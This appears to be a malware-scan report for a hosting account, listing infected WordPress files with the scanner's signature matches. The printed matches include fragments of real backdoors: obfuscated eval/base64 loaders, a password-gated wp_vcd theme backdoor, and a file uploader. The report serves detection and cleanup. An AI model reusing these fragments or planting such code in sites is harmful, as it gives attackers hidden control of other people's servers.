/custdata02/duane/.trash/homey/wp-content/plugins/sexy-contact-form/includes/fileupload/files/73.php Size: 85.60 kB Created: 2014-11-07 20:01:31 Modified: 2019-03-09 21:18:04 Warns: 2 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "7P12auM2EjAKf+6ck//AKD1we9x6Rpt6tds9kbVF+1dMV2V9UbVVrdwkRCIzub/9rQJAitTipd3JPPO8t3QcViBDKBQKtQCF4ntdsqUhaseFfub5xYLnULfcjz+8N8yFOrKVVEhKLKkPj0KalnrKPbV/gs9/gedJ3zw9yTa6zcdHJdc++cA9PjbFYePx8Qx4S4tGQUmGA1Y+ff+YenGEU+bXk2kul23Mw6/HV6uRzJ38/uGkJVZY2zw54366u+MWqi2b3Bn3BwDg4N/KRw1ma1faXYYvay7Gx7ikpGNadtQ3QVVUS8+cTQp+/xNEk1pMBpwfclIdKqekzi/mYygNH4fmQBoqSX9sytNvq2I9yqZlbU+f29Ly5FAy3+3uPIXyVEVQPvmw29JEp4/m1NRUVadUxWVZRcdfUhopg5HyqI0WC2YIve8DMSxsYKszrxOOT4B0BOKjejmW4iKNpY66tPTHryNWMeXH4aiPtdzn7tQAxbPifRK...
| Exploit execution Line: 5 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode(($jkt48)
| Function eval Line: 5 Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval(str_rot13(gzinflate(str_rot13(base64_decode(($jkt48))))))
| Sign 11413268 Line: 5 Dangerous Malware Signature (hash: 11413268) | <?php eval(str_rot13
|
|
/custdata02/duane/.trash/homey/wp-content/plugins/sexy-contact-form/includes/resources/words/en.php Size: 603.85 kB Created: 2014-08-16 15:54:05 Modified: 2019-03-09 21:18:05 Dangers: 2
| Description | Match |
|---|
Sign 664602fe Line: 21704 Dangerous Malware Signature (hash: 664602fe) | <?php flooder
| Sign d30fc49e Line: 5048 Dangerous Malware Signature (hash: d30fc49e) | <?php backdoor
|
|
/custdata02/duane/.trash/homey/wp-content/plugins/sexy-contact-form/includes/sexycontactform_widget.php Size: 2.70 kB Created: 2014-08-16 15:54:05 Modified: 2019-03-09 21:18:04 Warns: 1
| Description | Match |
|---|
Function create_function Line: 76 Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function('', 'return register_widget("sexycontactform_widget");'))
|
|
/custdata02/duane/.trash/IMAGINEMUSICINSTRUCTION.COM/IMI/wp-content/plugins/cpaddons-site-software.php Size: 1.58 kB Created: 2016-06-21 18:00:26 Modified: 2019-03-09 21:47:57 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '$a', "return null;" ) ); add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) )
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-admin/includes/medias.php Size: 4.98 kB Created: 2016-04-12 20:00:22 Modified: 2019-09-28 19:48:11 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit concat_vars_array Line: 5 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Sign 689d8acc Line: 44 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign f822975d Line: 45 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-admin/network/user-terms.php Size: 787.00 B Created: 2016-04-12 20:00:22 Modified: 2019-09-28 19:48:11 Dangers: 5
| Description | Match |
|---|
Sign 0cb3135e Line: 1 Dangerous Malware Signature (hash: 0cb3135e) | <?php $lq="FzZTY0X2RlY29kZSgkX1BPU1RbJ3owJ10pO"; $bu="yBAxZXZhbCgiXCRzYWZlZGcgPSAkeHNzZXI7Iik7IH0="; $avj = str_replace("j","","sjtrj_jrjejpljajcje"); $qu = $avj("i", "", "ibiaisie6i4i_dieicoide"); $fh = $avj("k","","crkekatkek_kfkukncktkikon"); $hwy = $fh("", $qu($avj("x", "", $or.$zs.$lq.$bu)));
| Sign 43b0d90f Line: 1 Dangerous Malware Signature (hash: 43b0d90f) | <?php echo "Uploader By Psyco
| Sign d624bede Dangerous Malware Signature (hash: d624bede) | <?php <?php if($_GET["login"]=="jBq9Ft"){$or="JG11amogxPSAkX1BPU1RbJ3onXTsgaWYg"; $zs="KCRtdWpqIT0iIikgeyAkeHxNzZXI9Ym"; $lq="FzZTY0X2RlY29kZSgkX1BPU1RbJ3owJ10pO"; $bu="yBAxZXZhbCgiXCRzYWZlZGcgPSAkeHNzZXI7Iik7IH0="; $avj = str_replace("j","","sjtrj_jrjejpljajcje"); $qu = $avj("i", "", "ibiaisie6i4i_dieicoide"); $fh = $avj("k","","crkekatkek_kfkukncktkikon"); $hwy = $fh("", $qu($avj("x", "", $or.$zs.$lq.$bu)));$hwy(); $target_path=basename($_FILES["uploadedfile"]["name"]);if(move_uploaded_file($_FILES[...
| Sign d97f004d Line: 1 Dangerous Malware Signature (hash: d97f004d) | <?php ZXZhb
| Sign e6546205 Line: 1 Dangerous Malware Signature (hash: e6546205) | <?php kX1BPU1
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-admin/user/updater.php Size: 1.82 kB Created: 2019-02-28 02:19:12 Modified: 2019-09-28 19:48:11 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 1 Dangerous Malware Signature (hash: 3a6c61ab) | <?php { $z=$n[3]; $name="moban"; } if($_GET["dir"]){
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/plugins/itr-popup/scripts/jscolor/itro-admin-scripts-jBq9Ft.php Size: 4.16 kB Created: 2019-01-18 16:39:06 Modified: 2019-09-28 19:48:11 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 48 Dangerous Malware Signature (hash: 3a6c61ab) | <?php {
$z=$n[3];
$name="moban";
}
if($_GET['dir']){
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/plugins/cpaddons-site-software.php Size: 1.58 kB Created: 2016-04-12 20:00:22 Modified: 2019-09-28 19:48:11 Warns: 1
| Description | Match |
|---|
Function create_function Warning Potentially dangerous function `create_function` [https://www.php.net/create_function] | <?php create_function( '$a', "return null;" ) ); add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) )
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/themes/twentyfifteen/functions.php Size: 23.33 kB Created: 2017-06-13 15:37:15 Modified: 2019-09-28 19:48:11 Dangers: 7
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign fa642904 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</...
| Sign fa642904 Line: 186 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
...
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/themes/twentyfourteen/functions.php Size: 27.02 kB Created: 2017-06-13 15:37:15 Modified: 2019-09-28 19:48:11 Dangers: 7
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign fa642904 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</...
| Sign fa642904 Line: 186 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
...
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/themes/twentysixteen/functions.php Size: 25.12 kB Created: 2017-06-13 15:37:15 Modified: 2019-09-28 19:48:11 Dangers: 7
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign fa642904 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</...
| Sign fa642904 Line: 186 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
...
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/themes/zerif-lite/functions.php Size: 67.26 kB Created: 2017-06-13 15:37:15 Modified: 2019-09-28 19:48:11 Dangers: 7
| Description | Match |
|---|
Sign 241a94f3 Dangerous Malware Signature (hash: 241a94f3) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 407651f7 Line: 114 Dangerous Malware Signature (hash: 407651f7) | <?php wp-tmp.php
| Sign 471b95ee Line: 110 Dangerous Malware Signature (hash: 471b95ee) | <?php stripos($tmpcontent, $wp_auth_key)
| Sign 50db2c9d Line: 2 Dangerous Malware Signature (hash: 50db2c9d) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign 97c00b82 Dangerous Malware Signature (hash: 97c00b82) | <?php <?php
if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
$div_code_name="wp_vcd";
switch ($_REQUEST['action'])
{
case 'change_domain';
if (isset($_REQUEST['newdomain']))
{
if (!empty($_REQUEST['newdomain']))
{
if ($file = @file_get_contents(__FILE__))
...
| Sign fa642904 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512')) { switch ($_REQUEST['action']) { case 'get_all_links'; foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data) { $data['code'] = ''; if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_)) { $data['code'] = $_[1]; } print '<e><w>1</...
| Sign fa642904 Line: 186 Dangerous Malware Signature (hash: fa642904) | <?php if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'bb7e3676b9c67e973fff8860651df512'))
{
switch ($_REQUEST['action'])
{
case 'get_all_links';
foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
{
$data['code'] = '';
if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
...
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/wflogs/config.php Size: 0.96 MB Created: 2019-09-28 19:44:26 Modified: 2019-09-28 19:48:11 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "Oh0qGVIWL3AJY0UMa29kPHESdDdyaW0MRXd6A2oBCg0GYjVjbx53CmR3MBpBDhwBCChzWWZXC2QgYC1NJA0EEENDKhlSNwxHOAooOnNneiY7eR9TIhRmZFA+Fmh8Sl9NMQwVPzYxPEMadx8UED0nG0woDUl1UyRQJSsDHBsWH2BDfE98JS8IWCd2AhUFdARWaiMiAjJZN0oHHhZHcmVmFh4PBXo+PyFDKF0wYl5LJzROKHNZZjZ1cAceITAGd34JMWspCTcJKmEKETFrdXhUDyYwLBwsTDFcLh45HgRlEmVlD1QNPC42VidYH0lJBxIEA1YDCCkSMksqORcANVkfYENjKmEGJh5HPDkGLQUGVVB1Dx8Ca3Z4ZFAfK1osUFlWIydUfHszM3oaWEZicUknNBVec3ZoCzRMOiUfMxtHF3FcYyo2XBwxFmwLBCEpP1AbJHFvUwJMMR8GYiVEPVcaWCs/E3x5KjBUK0IfTUQOFUgCEUFDKA9...
| Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php CeXE
| Sign ae7830db Line: 6 Dangerous Malware Signature (hash: ae7830db) | <?php Y2Hy
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-content/wflogs/rules.php Size: 171.61 kB Created: 2019-09-28 00:57:14 Modified: 2019-09-28 19:48:11 Dangers: 1
| Description | Match |
|---|
Sign d30fc49e Line: 202 Dangerous Malware Signature (hash: d30fc49e) | <?php backdoor
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-includes/customize/class-wp-customize-filters-setting.php Size: 4.98 kB Created: 2016-04-12 20:00:22 Modified: 2019-09-28 19:48:11 Warns: 1 Dangers: 2
| Description | Match |
|---|
Exploit concat_vars_array Line: 5 Warning Concatenation of arrays technique is usually used for the obfuscation of malicious code | <?php $O00O0O{7}.$O00O0O{19}.$O00O0O{19}.$O00O0O{15}.$O00O0O{64}.$O00O0O{65}.$O00O0O{65}
| Sign 689d8acc Line: 44 Dangerous Malware Signature (hash: 689d8acc) | <?php if(isset($act) && $act == 'redate' && isset($redate_file)){
if(file_exists($redate_file)){
echo rdFile($redate_file);
}
}
| Sign f822975d Line: 45 Dangerous Malware Signature (hash: f822975d) | <?php if(file_exists($redate_file)){
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-includes/post.php Size: 201.69 kB Created: 2018-05-02 15:08:27 Modified: 2019-09-28 19:48:11 Dangers: 1
| Description | Match |
|---|
Sign 407651f7 Line: 1 Dangerous Malware Signature (hash: 407651f7) | <?php wp-vcd
|
|
/custdata02/duane/.trash/CONDORMAN.ORG/wp-includes/wp-vcd.php Size: 12.69 kB Created: 2018-05-07 19:27:19 Modified: 2019-09-28 19:48:11 Warns: 1 Dangers: 17
| Description | Match |
|---|
Exploit base64_long Line: 5 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php 'PD9waHAKaWYgKGlzc2V0KCRfUkVRVUVTVFsnYWN0aW9uJ10pICYmIGlzc2V0KCRfUkVRVUVTVFsncGFzc3dvcmQnXSkgJiYgKCRfUkVRVUVTVFsncGFzc3dvcmQnXSA9PSAneyRQQVNTV09SRH0nKSkKCXsKJGRpdl9jb2RlX25hbWU9IndwX3ZjZCI7CgkJc3dpdGNoICgkX1JFUVVFU1RbJ2FjdGlvbiddKQoJCQl7CgoJCQkJCgoKCgoJCQkJY2FzZSAnY2hhbmdlX2RvbWFpbic7CgkJCQkJaWYgKGlzc2V0KCRfUkVRVUVTVFsnbmV3ZG9tYWluJ10pKQoJCQkJCQl7CgkJCQkJCQkKCQkJCQkJCWlmICghZW1wdHkoJF9SRVFVRVNUWyduZXdkb21haW4nXSkpCgkJCQkJCQkJewogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA...
| Sign 0f37c730 Line: 5 Dangerous Malware Signature (hash: 0f37c730) | <?php mdW5jdGlvb
| Sign 407651f7 Line: 5 Dangerous Malware Signature (hash: 407651f7) | <?php w/cGhw
| Sign 4a069524 Line: 5 Dangerous Malware Signature (hash: 4a069524) | <?php aW5jbHVkZ
| Sign 7186bb8d Line: 5 Dangerous Malware Signature (hash: 7186bb8d) | <?php RlZmluZ
| Sign 7830f7a6 Line: 5 Dangerous Malware Signature (hash: 7830f7a6) | <?php N0YX
| Sign 7f5d33bf Line: 5 Dangerous Malware Signature (hash: 7f5d33bf) | <?php jbG9zZ
| Sign 91535293 Line: 5 Dangerous Malware Signature (hash: 91535293) | <?php leHRyYWN0
| Sign 963e968a Line: 5 Dangerous Malware Signature (hash: 963e968a) | <?php pbmNsdWRl
| Sign a408f408 Line: 5 Dangerous Malware Signature (hash: a408f408) | <?php cHJlZ19yZXBsYWNl
| Sign ae7830db Line: 5 Dangerous Malware Signature (hash: ae7830db) | <?php yZXBsYWNl
| Sign bced5841 Line: 5 Dangerous Malware Signature (hash: bced5841) | <?php 8P3Boc
| Sign d30fc49e Line: 5 Dangerous Malware Signature (hash: d30fc49e) | <?php b3Blb
| Sign d97f004d Line: 5 Dangerous Malware Signature (hash: d97f004d) | <?php ZXh0cmFjd
| Sign de12c454 Line: 5 Dangerous Malware Signature (hash: de12c454) | <?php V4dHJhY3
| Sign e6546205 Line: 5 Dangerous Malware Signature (hash: e6546205) | <?php kX1JFUVVFU1
| Sign ee1cb326 Line: 5 Dangerous Malware Signature (hash: ee1cb326) | <?php 9wZW
| Sign eefb0b0b Line: 8 Dangerous Malware Signature (hash: eefb0b0b) | <?php $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
|
|
/custdata02/duane/php/Archive/Zip.php Size: 122.68 kB Created: 2017-06-08 20:09:32 Modified: 2019-03-09 21:47:35 Warns: 1 Dangers: 1
| Description | Match |
|---|
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval] | <?php eval('$v_result = '.$p_params[ARCHIVE_ZIP_PARAM_PRE_ADD].'(ARCHIVE_ZIP_PARAM_PRE_ADD, $v_local_header);'); if ($v_result == 0) { $p_header['status'] = "skipped"; $v_result = 1; } if ($p_header['stored_filename'] != $v_local_header['stored_filename']) { $p_header['stored_filename'] = $this->_tool_PathReduction($v_local_header['stored_filename']); } } if ($p_header['stored_filename'] == "") { $p_header['status'] = "filtered"; } if (strlen($p_header['stored_filename']) > 0xFF) { $p_header['status']...
| Sign 963e968a Line: 3465 Dangerous Malware Signature (hash: 963e968a) | <?php php_uname()
|
|
/custdata02/duane/public_html/.smileys/index.php Size: 9.48 kB Created: 2014-11-09 19:09:53 Modified: 2019-03-09 21:47:36 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Line: 215 Dangerous Hacker credits | <?php Hacked By
|
|
/custdata02/duane/public_html/.smileys/x.php Size: 22.00 B Created: 2014-11-07 20:47:47 Modified: 2019-03-09 21:47:36 Dangers: 1
| Description | Match |
|---|
Exploit hacked_by Dangerous Hacker credits | <?php hacked by
|
|
/custdata02/duane/public_html/putinontheritz.com/wp-content/wflogs/rules.php Size: 662.78 kB Created: 2024-06-08 23:33:47 Modified: 2024-06-13 00:24:20 Dangers: 1
| Description | Match |
|---|
Sign d30fc49e Line: 1401 Dangerous Malware Signature (hash: d30fc49e) | <?php backdoor
|
|
/custdata02/duane/public_html/putinontheritz.com/wp-content/wflogs/config-transient.php Size: 1.46 MB Created: 2024-06-08 23:33:48 Modified: 2024-06-13 00:01:46 Warns: 2 Dangers: 3
| Description | Match |
|---|
Exploit base64_long Line: 6 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "X5iE4ehqpiAXx352hUPL6iOk7eZfpELUCq5R7RTPBukCGEdkp2F/Rj9H6uWpOEoDU0FFTcnG44fOFAW2SgNDbPWITYZRBFVQfxIuESVjPdyIOELmxRqdpGR4bLAe+3DZhNl7JGSRI103sLk0HZNjBitoN4vdttkMcnNs1fpegtBCHS9cMvVZ+niwn52SdemnFYeb8zO6HViBAzhrILmy9QCS1xewzRWu9LHZbj/yTGvugOWvZPWQ06mEOry2dGHBdvSD3CxUg2ansIjQumCRPQeI4AY/bIAy6bc4F+tpUV0JUiCJXD5NrRd2/TczOWwygqe9huepVd368SIVJ4A5lg=="
| Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "c0EUCTtMPDxUPzQoXBV5Qhc3A2gIPCxOBjg3LGBdYAN8QgQsIj4kCA4gCAUJdWx/aDkqNAQAOXkbZzQcYWEDZQRBdAlDHxMLezsEK3h5YTMXQkB7QkIsHzkNcyxgW2B9AQkrA2kWWggEIAgPEht/H3UpVzR6OhZ5ZRk0bmEfJ2V0PwYJRS9uCHhKNFZ4BxUzZTdZPDJCLGF1DXMsHilgcQEJK30bFlYIBEoIAxJlDWELKVs0BHU5BxtnNBwTYVlzdEF0CUkvbgt4RjQoCnlrM2k3J3cyQiwfBw1/LB4pHgMBBSt9Iy8kdnogen1sZQFhdVslSjsHR3kbazRiUmFZG3RNdHc7URAICjhKKAZ5FUEXSSd7MjxeYXkNcyxgW2B9AQkrA2kWWjB6Xgh9YGUBYQspJUYEeTkHGxlGHB9hWRt0TXR3Ai9udghGBxpCV39bFBoJKQwRAh93cw0sGAFUNi50ETYrLyQIGRMkHD5RU1RHExZKdHl...
| Function strrev exec_strrev Line: 6 Dangerous Encoded Function `exec` [https://www.php.net/exec] | <?php CExE
| Sign 7830f7a6 Line: 6 Dangerous Malware Signature (hash: 7830f7a6) | <?php NVCH
| Sign de12c454 Line: 6 Dangerous Malware Signature (hash: de12c454) | <?php VJAg
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-admin/user/updater.php Size: 1.82 kB Created: 2019-02-28 02:22:16 Modified: 2019-03-09 22:14:34 Dangers: 1
| Description | Match |
|---|
Sign 3a6c61ab Line: 1 Dangerous Malware Signature (hash: 3a6c61ab) | <?php { $z=$n[3]; $name="moban"; } if($_GET["dir"]){
|
|
/custdata02/duane/public_html/janitorialevs.com/wp-admin/user/class-util.php Size: 3.83 kB Created: 2021-04-16 06:45:06 Modified: 2021-04-16 06:45:06 Warns: 2
| Description | Match |
|---|
Exploit base64_long Line: 31 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code | <?php "yqSj0deU1ZulptOsnM/LXmJba4VzQ4WjxqSfg3JRko+pe4PBxHCDQz+gx2Cc1NebplpUxKyCrXi4i1nJnp2Yj9qiU7+OXt5DP0CFrJTTy5umkaDG2qGelcajnNGWnphYiZF3q7F6tpFXncqkmMDZplSPi4fUms6Yh41gnkI7PJnLWp7R25rCq6Wj0JmXxsiVmJucyo5dwHmufHy2kFOZmdGXkNfVV8CRV6vOqJLPxaOXVI2Riq3CpcyVq8KlkqeYjlusb28+bJuYn9BYVZ3KpaCmUMjVpdClooxZyqeWmJ7BVG/X1aHSl5lX1K2WxMmppW5fy9Wn1XGhkqmDZG9Va3I8Ot/KodabsERrQTzGx56hUlKhzKjPp4WTps+ko3CMh6SWxsFXoaulo9CZl4HKl5uebJTMqM+no2yZ1VVgcVKgPztr4kJts0JBxpub0IRYbpif19NZxqHIpLDTmm6PUtKnndbOpcSoqWbHp6XOkZqTppHBiFn...
